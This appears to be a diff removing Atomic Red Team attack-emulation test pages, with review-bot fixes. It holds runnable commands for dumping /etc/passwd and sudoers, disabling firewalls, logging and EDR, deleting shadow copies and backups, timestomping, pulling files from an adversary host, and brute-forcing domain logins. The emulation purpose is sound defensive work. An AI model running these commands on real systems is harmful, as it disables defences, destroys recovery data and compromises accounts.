- [Atomic Test #4 - List opened files by user](#atomic-test-4---list-opened-files-by-user)

- [Atomic Test #5 - Show if a user account has ever logger in remotely](#atomic-test-5---show-if-a-user-account-has-ever-logger-in-remotely)


<br/>

## Atomic Test #1 - List all accounts
xxx

**Supported Platforms:** Linux, macOS


#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|

#### Run it with `sh`!
```
cat /etc/passwd > #{output_file}
```
<br/>
<br/>

## Atomic Test #2 - View sudoers access
xxx (requires root)

**Supported Platforms:** Linux, macOS


#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|

#### Run it with `sh`!
```
cat /etc/sudoers > #{output_file}
```
<br/>
<br/>

## Atomic Test #3 - View accounts with UID 0
xxx

**Supported Platforms:** Linux, macOS


#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|

#### Run it with `sh`!
```
grep 'x:0:' /etc/passwd > #{output_file}
```
<br/>
<br/>

## Atomic Test #4 - List opened files by user
xxx

**Supported Platforms:** Linux, macOS


#### Run it with `sh`!
```
username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
```
<br/>
<br/>

## Atomic Test #5 - Show if a user account has ever logger in remotely
xxx

**Supported Platforms:** Linux, macOS


#### Run it with `sh`!
```
lastlog > #{output_file}
```
<br/>
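Review bot: Atomic Test #5 redirects to `#{output_file}` but, unlike Tests #1 to #3, has no `#### Inputs` table defining it, so the placeholder is never substituted. Test #4 derives the user name from `$HOME` with `awk -F'/' '{print $3}'`, which gives an empty string for `root` (`/root` has no third path component) and then runs `lsof -u` with no argument; `$(id -un)` is the portable way to get the current user on both Linux and macOS. The heading "has ever logger in remotely" should read "logged in", and the table-of-contents anchor generated from it will change with the fix. All five descriptions are still the `xxx` placeholder. Since this PR deletes the file, carry these fixes into the uppercase replacement rather than copying them over.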
@@ -1,98 +0,0 @@
|
||||
# T1089 - Disabling Security Tools
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1089)
|
||||
<blockquote>Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.
|
||||
|
||||
Detection: Monitor processes and command-line arguments to see if security tools are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log or event file reporting may be suspicious.
|
||||
|
||||
Platforms: Linux, macOS, Windows
|
||||
|
||||
Data Sources: API monitoring, Anti-virus, File monitoring, Services, Windows Registry, Process command-line parameters
|
||||
|
||||
Defense Bypassed: Anti-virus, File monitoring, Host intrusion prevention systems, Signature-based detection, Log analysis</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - Disable iptables firewall](#atomic-test-1---disable-iptables-firewall)
|
||||
|
||||
- [Atomic Test #2 - Disable syslog](#atomic-test-2---disable-syslog)
|
||||
|
||||
- [Atomic Test #3 - Disable Cb Response](#atomic-test-3---disable-cb-response)
|
||||
|
||||
- [Atomic Test #4 - Disable SELinux](#atomic-test-4---disable-selinux)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - Disable iptables firewall
|
||||
Disables the iptables firewall
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
|
||||
then
|
||||
service iptables stop
|
||||
chkconfig off iptables
|
||||
service ip6tables stop
|
||||
chkconfig off ip6tables
|
||||
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
|
||||
systemctl stop firewalld
|
||||
systemctl disable firewalld
|
||||
fi
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - Disable syslog
|
||||
Disables syslog collection
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
|
||||
then
|
||||
service rsyslog stop
|
||||
chkconfig off rsyslog
|
||||
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
|
||||
systemctl stop rsyslog
|
||||
systemctl disable rsyslog
|
||||
fi
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - Disable Cb Response
|
||||
Disable the Cb Response service
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
|
||||
then
|
||||
service cbdaemon stop
|
||||
chkconfig off cbdaemon
|
||||
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
|
||||
systemctl stop cbdaemon
|
||||
systemctl disable cbdaemon
|
||||
fi
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #4 - Disable SELinux
|
||||
Disables SELinux enforcement
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
setenforce 0
|
||||
```
|
||||
<br/>
|
||||
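Review bot: the `sh` blocks of Atomic Tests #1, #2 and #3 are not valid shell: `else if [ ... ];` is followed neither by `then` nor by a second `fi`, so the script fails to parse. Write it as `elif [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ]; then`. The `chkconfig off iptables` lines also have the arguments reversed (`chkconfig iptables off`), and the same reversal appears for `ip6tables`, `rsyslog` and `cbdaemon`; worth fixing when this file is re-added.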
@@ -1,84 +0,0 @@
|
||||
# T1099 - Timestomp
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1099)
|
||||
<blockquote>Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools. Timestomping may be used along with file name Masquerading to hide malware and tools. (Citation: WindowsIR Anti-Forensic Techniques)
|
||||
|
||||
Detection: Forensic techniques exist to detect aspects of files that have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques) It may be possible to detect timestomping using file modification monitoring that collects information on file handle opens and can compare timestamp values.
|
||||
|
||||
Platforms: Linux, Windows
|
||||
|
||||
Data Sources: File monitoring, Process monitoring, Process command-line parameters
|
||||
|
||||
Defense Bypassed: Host forensic analysis
|
||||
|
||||
Permissions Required: User, Administrator, SYSTEM</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - Set a file's access timestamp](#atomic-test-1---set-a-files-access-timestamp)
|
||||
|
||||
- [Atomic Test #2 - Set a file's modification timestamp](#atomic-test-2---set-a-files-modification-timestamp)
|
||||
|
||||
- [Atomic Test #3 - Set a file's creation timestamp](#atomic-test-3---set-a-files-creation-timestamp)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - Set a file's access timestamp
|
||||
Stomps on the access timestamp of a file
|
||||
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| target_filename | Path of file that we are going to stomp on last access time | Path | |
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
touch -a -t 197001010000.00 #{target_filename}
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - Set a file's modification timestamp
|
||||
Stomps on the modification timestamp of a file
|
||||
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| target_filename | Path of file that we are going to stomp on last access time | Path | |
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
touch -m -t 197001010000.00 #{target_filename}
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - Set a file's creation timestamp
|
||||
Stomps on the create timestamp of a file
|
||||
|
||||
Setting the creation timestamp requires changing the system clock and reverting.
|
||||
Sudo or root privileges are required to change date. Use with caution.
|
||||
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| target_filename | Path of file that we are going to stomp on last access time | Path | |
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
NOW=$(date)
|
||||
date -s "1970-01-01 00:00:00"
|
||||
touch #{target_filename}
|
||||
date -s "$NOW"
|
||||
stat #{target_filename}
|
||||
```
|
||||
<br/>
|
||||
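Review bot: the Inputs rows of Atomic Tests #2 and #3 were copied from Test #1 and still say "last access time" although those tests stomp the modification and creation timestamps. In Test #3, `date -s` is the GNU syntax and not the macOS `date` syntax, yet the test is listed for Linux and macOS; restoring the clock with `date -s "$NOW"` also drops the seconds that elapsed while the test ran, and `touch #{target_filename}` on an already existing file only updates its access and modification times, so the creation timestamp is affected only when the file is created during the test. The description should say so.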
@@ -1,68 +0,0 @@
|
||||
# T1105 - Remote File Copy
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1105)
|
||||
<blockquote>Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
|
||||
|
||||
Adversaries may also copy files laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with Windows Admin Shares or Remote Desktop Protocol.
|
||||
|
||||
Detection: Monitor for file creation and files transferred within a network over SMB. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.
|
||||
|
||||
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
|
||||
|
||||
Platforms: Linux, macOS, Windows
|
||||
|
||||
Data Sources: File monitoring, Packet capture, Process use of network, Netflow/Enclave netflow, Network protocol analysis, Process monitoring
|
||||
|
||||
Permissions Required: User
|
||||
|
||||
Requires Network: Yes</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - xxxx](#atomic-test-1---xxxx)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - xxxx
|
||||
xxxx
|
||||
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
#### Run it with `bash`!
|
||||
```
|
||||
### TODO: Not sure how to handle commands that need to be run on multiple systems
|
||||
|
||||
# Adversary System Configuration
|
||||
# Ensure SSH access has been configured for an adversary account
|
||||
echo "This file transferred by scp" > /tmp/adversary-scp
|
||||
echo "This file transferred by sftp" > /tmp/adversary-sftp
|
||||
mkdir /tmp/adversary-rsync
|
||||
cd /tmp/adversary-rsync
|
||||
touch a b c d e f g
|
||||
|
||||
# Victim System Configuration
|
||||
# Ensure SSH access has been configured for a victim account
|
||||
# Ensure write access for victim account to this directory
|
||||
mkdir /tmp/victim-files
|
||||
cd /tmp/victim-files
|
||||
|
||||
# Push files to victim using rsync
|
||||
rsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files/
|
||||
|
||||
# Pull files from adversary using rsync
|
||||
rsync -r adversary@adversary-host:/tmp/adversary-rsync/ /tmp/victim-files/
|
||||
|
||||
# Push files to victim using scp
|
||||
scp /tmp/adversary-scp victim@victim-host:/tmp/victim-files/
|
||||
|
||||
# Pull file from adversary using scp
|
||||
scp adversary@adversary-host:/tmp/adversary-scp /tmp/victim-files/scp-file
|
||||
|
||||
# Push files to victim using sftp
|
||||
sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp'
|
||||
|
||||
# Pull file from adversary using sftp
|
||||
sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file
|
||||
```
|
||||
<br/>
|
||||
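Review bot: the single test in this file still carries the placeholder name `xxxx`, a placeholder description and the `### TODO` line about multi-system commands inside the `bash` block, and the table of contents links to `#atomic-test-1---xxxx`. The block also mixes adversary-side setup (`mkdir /tmp/adversary-rsync`) with victim-side commands, and neither `mkdir` uses `-p`, so a second run fails; splitting this into separate setup and transfer tests with declared inputs for `victim-host` and `adversary-host` would make it runnable.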
@@ -1,237 +0,0 @@
|
||||
# T1107 - File Deletion
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1107)
|
||||
<blockquote>Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.
|
||||
|
||||
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native cmd functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)
|
||||
|
||||
Detection: It may be uncommon for events related to benign command-line functions such as DEL or third-party utilities or tools to be found in an environment, depending on the user base and how systems are typically used. Monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe.
|
||||
|
||||
Platforms: Linux, Windows, macOS
|
||||
|
||||
Data Sources: Binary file metadata, File monitoring, Process command-line parameters
|
||||
|
||||
Defense Bypassed: Host forensic analysis
|
||||
|
||||
Permissions Required: User
|
||||
|
||||
Contributors: Walker Johnson</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - Victim configuration](#atomic-test-1---victim-configuration)
|
||||
|
||||
- [Atomic Test #2 - Delete a single file](#atomic-test-2---delete-a-single-file)
|
||||
|
||||
- [Atomic Test #3 - Delete an entire folder](#atomic-test-3---delete-an-entire-folder)
|
||||
|
||||
- [Atomic Test #4 - Overwrite and delete a file with shred](#atomic-test-4---overwrite-and-delete-a-file-with-shred)
|
||||
|
||||
- [Atomic Test #5 - Victim configuration](#atomic-test-5---victim-configuration)
|
||||
|
||||
- [Atomic Test #6 - Delete a single file - cmd](#atomic-test-6---delete-a-single-file---cmd)
|
||||
|
||||
- [Atomic Test #7 - Delete an entire folder - cmd](#atomic-test-7---delete-an-entire-folder---cmd)
|
||||
|
||||
- [Atomic Test #8 - Delete a single file - ps](#atomic-test-8---delete-a-single-file---ps)
|
||||
|
||||
- [Atomic Test #9 - Delete an entire folder - ps](#atomic-test-9---delete-an-entire-folder---ps)
|
||||
|
||||
- [Atomic Test #10 - Delete VSS - vssadmin](#atomic-test-10---delete-vss---vssadmin)
|
||||
|
||||
- [Atomic Test #11 - Delete VSS - wmic](#atomic-test-11---delete-vss---wmic)
|
||||
|
||||
- [Atomic Test #12 - bcdedit](#atomic-test-12---bcdedit)
|
||||
|
||||
- [Atomic Test #13 - wbadmin](#atomic-test-13---wbadmin)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - Victim configuration
|
||||
Create a temporary directory and several files on the victim system for later deletion
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
mkdir /tmp/victim-files
|
||||
cd /tmp/victim-files
|
||||
touch a b c d e f g
|
||||
echo "This file will be shredded" > /tmp/victim-shred.txt
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - Delete a single file
|
||||
Delete a single file from the temporary directory
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
rm -f /tmp/victim-files/a
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - Delete an entire folder
|
||||
Recursively delete the temporary directory and all files contained within it
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
rm -rf /tmp/victim-files
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #4 - Overwrite and delete a file with shred
|
||||
Use the `shred` command to overwrite the temporary file and then delete it
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
shred -u /tmp/victim-shred.txt
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #5 - Victim configuration
|
||||
Create a temporary directory and several files on the victim system for later deletion
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
mkdir %TEMP%\victim-files-cmd
|
||||
cd %TEMP%\victim-files-cmd
|
||||
type nul > a
|
||||
type nul > b
|
||||
type nul > c
|
||||
type nul > d
|
||||
type nul > e
|
||||
type nul > f
|
||||
type nul > g
|
||||
mkdir %TEMP%\victim-files-ps
|
||||
cd %TEMP%\victim-files-ps
|
||||
type nul > a
|
||||
type nul > b
|
||||
type nul > c
|
||||
type nul > d
|
||||
type nul > e
|
||||
type nul > f
|
||||
type nul > g
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #6 - Delete a single file - cmd
|
||||
Delete a single file from the temporary directory using cmd.exe
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
del /f %TEMP%\victim-files-cmd\a
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #7 - Delete an entire folder - cmd
|
||||
Recursively delete the temporary directory and all files contained within it using cmd.exe
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
del /f /S %TEMP%\victim-files-cmd
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #8 - Delete a single file - ps
|
||||
Delete a single file from the temporary directory using Powershell
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Run it with `powershell`!
|
||||
```
|
||||
Remove-Item -path %TEMP%\victim-files-ps\a
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #9 - Delete an entire folder - ps
|
||||
Recursively delete the temporary directory and all files contained within it using Powershell
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Run it with `powershell`!
|
||||
```
|
||||
Remove-Item -path %TEMP%\victim-files-ps -recurse
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #10 - Delete VSS - vssadmin
|
||||
Delete all volume shadow copies with vssadmin.exe
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
vssadmin.exe Delete Shadows /All /Quiet
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #11 - Delete VSS - wmic
|
||||
Delete all volume shadow copies with wmic
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
wmic shadowcopy delete
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #12 - bcdedit
|
||||
xxx
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
bcdedit /set {default} bootstatuspolicy ignoreallfailures
|
||||
bcdedit /set {default} recoveryenabled no
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #13 - wbadmin
|
||||
xxx
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
wbdadmin delete catalog -quiet
|
||||
```
|
||||
<br/>
|
||||
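Review bot: several blocks in this file will not do what their descriptions say. Atomic Test #13 invokes `wbdadmin`, a typo for `wbadmin`. Atomic Tests #8 and #9 run under `powershell` but use `%TEMP%`, which PowerShell does not expand; use `$env:TEMP`. Atomic Test #7 uses `del /f /S %TEMP%\victim-files-cmd`, which deletes the files but leaves the directory tree in place, so "Recursively delete the temporary directory" needs `rmdir /S /Q`. Tests #12 and #13 still have the placeholder description `xxx`.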
@@ -1,54 +0,0 @@
|
||||
# T1110 - Brute Force
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1110)
|
||||
<blockquote>Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained.
|
||||
|
||||
Credential Dumping to obtain password hashes may only get an adversary so far when Pass the Hash is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table. Cracking hashes is usually done on adversary-controlled systems outside of the target network. (Citation: Wikipedia Password cracking)
|
||||
|
||||
Adversaries may attempt to brute force logins without knowledge of passwords or hashes during an operation either with zero knowledge or by attempting a list of known or possible passwords. This is a riskier option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)
|
||||
|
||||
A related technique called password spraying uses one password, or a small list of passwords, that matches the complexity policy of the domain and may be a commonly used password. Logins are attempted with that password and many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
|
||||
|
||||
Detection: It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network.
|
||||
|
||||
Monitor authentication logs for system and application login failures of Valid Accounts. If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.
|
||||
|
||||
Also monitor for many failed authentication attempts across various accounts that may result from password spraying attempts.
|
||||
|
||||
Platforms: Linux, macOS, Windows
|
||||
|
||||
Data Sources: Authentication logs
|
||||
|
||||
Permissions Required: User
|
||||
|
||||
Contributors: John Strand</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - Brute Force Credentials](#atomic-test-1---brute-force-credentials)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - Brute Force Credentials
|
||||
Creates username and password files then attempts to brute force on remote host
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| input_file_users | Path to a file containing a list of users that we will attempt to brute force | Path | DomainUsers.txt|
|
||||
| input_file_passwords | Path to a file containing a list of passwords we will attempt to brute force with | Path | passwords.txt|
|
||||
| remote_host | Hostname of the target system we will brute force upon | String | \\COMPANYDC1\IPC$|
|
||||
| domain | Domain name of the target system we will brute force upon | String | YOUR_COMPANY|
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
net user /domain > #{input_file_users}
|
||||
echo "Password1" >> #{input_file_passwords}
|
||||
echo "1q2w3e4r" >> #{input_file_passwords}
|
||||
echo "Password!" >> #{input_file_passwords}
|
||||
@FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
|
||||
```
|
||||
<br/>
|
||||
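Review bot: `net user /domain > #{input_file_users}` captures the whole command output, including the header, the multi-column layout and the "The command completed successfully." footer, so the outer `FOR /F` loop will also try those tokens as user names; the description should state that the file has to be reduced to one user per line first. Since the ATT&CK text above warns that this can trigger account lockouts, the test description ("attempts to brute force on remote host") should carry that warning, and the defaults `\\COMPANYDC1\IPC$` and `YOUR_COMPANY` should be clearly marked as placeholders.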
@@ -1,106 +0,0 @@
|
||||
# T1113 - Screen Capture
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1113)
|
||||
<blockquote>Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations.
|
||||
|
||||
===Mac===
|
||||
|
||||
On OSX, the native command <code>screencapture</code> is used to capture screenshots.
|
||||
|
||||
===Linux===
|
||||
|
||||
On Linux, there is the native command <code>xwd</code>. (Citation: Antiquated Mac Malware)
|
||||
|
||||
Detection: Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk. The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.
|
||||
|
||||
Platforms: Linux, macOS, Windows
|
||||
|
||||
Data Sources: API monitoring, Process monitoring, File monitoring</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - Screencapture](#atomic-test-1---screencapture)
|
||||
|
||||
- [Atomic Test #2 - Screencapture (silent)](#atomic-test-2---screencapture-silent)
|
||||
|
||||
- [Atomic Test #3 - X Windows Capture](#atomic-test-3---x-windows-capture)
|
||||
|
||||
- [Atomic Test #4 - Import](#atomic-test-4---import)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - Screencapture
|
||||
Use screencapture command to collect a full desktop screenshot
|
||||
|
||||
**Supported Platforms:** macOS
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| output_file | xxx
|
||||
| Path | desktop.png|
|
||||
|
||||
#### Run it with `bash`!
|
||||
```
|
||||
screencapture
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - Screencapture (silent)
|
||||
Use screencapture command to collect a full desktop screenshot
|
||||
|
||||
**Supported Platforms:** macOS
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| output_file | xxx
|
||||
| Path | desktop.png|
|
||||
|
||||
#### Run it with `bash`!
|
||||
```
|
||||
screencapture -x
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - X Windows Capture
|
||||
Use xwd command to collect a full desktop screenshot and review file with xwud
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| output_file | xxx
|
||||
| Path | desktop.xwd|
|
||||
|
||||
#### Run it with `bash`!
|
||||
```
|
||||
xwd -root -out #{output_file}
|
||||
xwud -in #{output_file}
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #4 - Import
|
||||
Use import command to collect a full desktop screenshot
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| output_file | xxx
|
||||
| Path | desktop.png|
|
||||
|
||||
#### Run it with `bash`!
|
||||
```
|
||||
import -window root
|
||||
```
|
||||
<br/>
|
||||
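Review bot: every Inputs table in this file is broken: the `output_file` row is split across two lines (`| output_file | xxx` followed by `| Path | desktop.png|`), so it will not render as a table row, and its description is the placeholder `xxx`. Only Atomic Test #3 actually uses `#{output_file}`; Tests #1, #2 and #4 run `screencapture`, `screencapture -x` and `import -window root` without the declared output path, so the default `desktop.png` is never written by them. Pass `#{output_file}` in each command.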
@@ -1,53 +0,0 @@
|
||||
# T1115 - Clipboard Data
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1115)
|
||||
<blockquote>Adversaries may collect data stored in the Windows clipboard from users copying information within or between applications.
|
||||
|
||||
===Windows===
|
||||
|
||||
Applications can access clipboard data by using the Windows API. (Citation: MSDN Clipboard)
|
||||
|
||||
===Mac===
|
||||
|
||||
OSX provides a native command, <code>pbpaste</code>, to grab clipboard contents (Citation: Operating with EmPyre).
|
||||
|
||||
Detection: Access to the clipboard is a legitimate function of many applications on a Windows system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.
|
||||
|
||||
Platforms: Linux, macOS, Windows
|
||||
|
||||
Data Sources: API monitoring</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - Utilize Clipboard to store or execute commands from](#atomic-test-1---utilize-clipboard-to-store-or-execute-commands-from)
|
||||
|
||||
- [Atomic Test #2 - PowerShell](#atomic-test-2---powershell)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - Utilize Clipboard to store or execute commands from
|
||||
Add data to clipboard to copy off or execute commands from.
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
dir | clip
|
||||
clip < readme.txt
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - PowerShell
|
||||
Utilize PowerShell to echo a command to clipboard and execute it
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Run it with `powershell`!
|
||||
```
|
||||
echo Get-Process | clip
|
||||
Get-Clipboard | iex
|
||||
```
|
||||
<br/>
|
||||
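Review bot: Atomic Test #1 reads `readme.txt` from the current directory with `clip < readme.txt`, but no such file is created by the test and no input declares it; either add an input with a default path or create the file in the test. In Atomic Test #2, `Get-Clipboard` exists only in Windows PowerShell 5.0 and later, which the description should mention next to the `Get-Clipboard | iex` step.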
